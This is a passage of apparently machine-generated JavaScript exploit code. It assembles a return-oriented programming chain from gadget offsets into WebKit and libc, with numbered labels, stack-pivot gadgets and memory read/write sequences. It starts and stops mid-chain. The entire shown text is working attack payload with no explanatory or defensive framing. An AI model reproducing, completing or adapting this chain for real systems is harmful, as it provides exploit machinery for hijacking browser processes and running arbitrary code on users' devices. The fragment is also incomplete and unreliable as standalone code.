webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+310120, //L6089
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+310104, //L6088
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6087:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6088:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6089:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+310288, //L6092
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+755774, //mov rax, rsi
libc_base+764760, //pop rsi
ropchain+310256, //L6090
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+310272, //L6091
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6090:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6091:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6092:
db([0, 0]); // 0x0
set_gadget(webkit_base+1438842,); //pop rdx
db([0, 0]); // 0x0
set_gadgets([
webkit_base+24132920, //div rsi ; add rax, rcx
libc_base+835093, //sub rax, rcx ; sbb rdx, rcx
libc_base+764760, //pop rsi
ropchain+310368, //L6093
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6093:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6095:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L6097:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+310528, //L6100
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+310512, //L6098
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6098:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6100:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+310688, //L6105
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+310704, //L6106
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+310640, //L6102
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6102:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6103:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L6104:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6105:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6106:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+310816, //L6107+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+310808, //L6107
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L6107:
db([0, 0]); // 0x0
set_gadgets([
ropchain+310832, //L6107+24
ropchain+311784, //L6101
libc_base+764760, //pop rsi
ropchain+310872, //L6108
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6108:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6110:
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+310992, //L6113
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+310976, //L6111
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6111:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6113:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+311136, //L6116
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+311104, //L6114
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+311120, //L6115
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6114:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6115:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6116:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+311232, //L6118
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6117:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L6118:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6119:
db([32, 0]); // 0x20
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+311336, //L6120
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+311352, //L6121
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6120:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6121:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+311528, //L6123
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+311544, //L6124
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+311512, //L6122
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6122:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6123:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6124:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+311688, //L6127
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+311704, //L6128
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+311656, //L6125
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6125:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6126:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L6127:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6128:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+311776, //L6129
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6129:
db([0, 0]); // 0x0
//L6101:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+311904, //L6132
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+311920, //L6133
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+311888, //L6131
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6131:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6132:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6133:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+312032, //L6135
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+312080, //L6138
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+312048, //L6136
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6135:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6136:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6137:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6138:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+312192, //L6139+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+312184, //L6139
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L6139:
db([0, 0]); // 0x0
set_gadgets([
ropchain+312208, //L6139+24
ropchain+312224, //L6134
libc_base+782311, //pop rsp
ropchain+300936, //L5858
//L6134:
//L6140:
//L5852:
libc_base+764760, //pop rsi
ropchain+312264, //L6141
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6141:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6143:
db([88, 0]); // 0x58
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+312384, //L6146
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+312368, //L6144
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6144:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6146:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+312560, //L6149
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+312576, //L6150
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+312528, //L6147
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+312544, //L6148
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6147:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6148:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6149:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6150:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+312672, //L6152
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+312656, //L6151
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6151:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6152:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+312752, //L6153
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6153:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6155:
db([80, 0]); // 0x50
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+312872, //L6158
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+312856, //L6156
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6156:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6158:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+313048, //L6161
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+313064, //L6162
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+313016, //L6159
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+313032, //L6160
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6159:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6160:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6161:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6162:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+313160, //L6164
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+313144, //L6163
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6163:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6164:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+313240, //L6165
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6165:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6167:
db([72, 0]); // 0x48
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+313360, //L6170
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+313344, //L6168
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6168:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6170:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+313536, //L6173
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+313552, //L6174
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+313504, //L6171
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+313520, //L6172
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6171:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6172:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6173:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6174:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+313648, //L6176
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+313632, //L6175
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6175:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6176:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+313728, //L6177
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6177:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6179:
db([64, 0]); // 0x40
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+313848, //L6182
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+313832, //L6180
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6180:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6182:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+313992, //L6185
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+313960, //L6183
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+313976, //L6184
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6183:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6184:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6185:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+314072, //L6186
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6186:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6188:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+314192, //L6191
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+314176, //L6189
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6189:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6191:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+314352, //L6195
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+314320, //L6193
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+314336, //L6194
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6192:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L6193:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6194:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6195:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+314408, //L6197
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L6197:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+314536, //L6199
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+314552, //L6200
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+314520, //L6198
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6198:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6199:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6200:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+314712, //L6204
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+314680, //L6202
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+314696, //L6203
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6201:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L6202:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6203:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6204:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+314768, //L6206
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L6206:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+314896, //L6208
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+314912, //L6209
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+314880, //L6207
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6207:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6208:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6209:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+315024, //L6212
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+314992, //L6210
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6210:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6211:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6212:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+315128, //L6213
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6213:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6215:
db([4294967256, 4294967295]); // -0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+315248, //L6218
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+315232, //L6216
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6216:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6218:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+315392, //L6221
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+315360, //L6219
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+315376, //L6220
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6219:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6220:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6221:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+315488, //L6223
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L6222:
db([4294967264, 4294967295]); // -0x20
set_gadget(libc_base+759608,); //pop rax
//L6223:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+315576, //L6224
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6224:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6226:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+315696, //L6229
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+315680, //L6227
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6227:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6229:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+315840, //L6232
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+315808, //L6230
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+315824, //L6231
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6230:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6231:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6232:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+315920, //L6233
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6233:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6235:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+316040, //L6238
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+316024, //L6236
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6236:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6238:
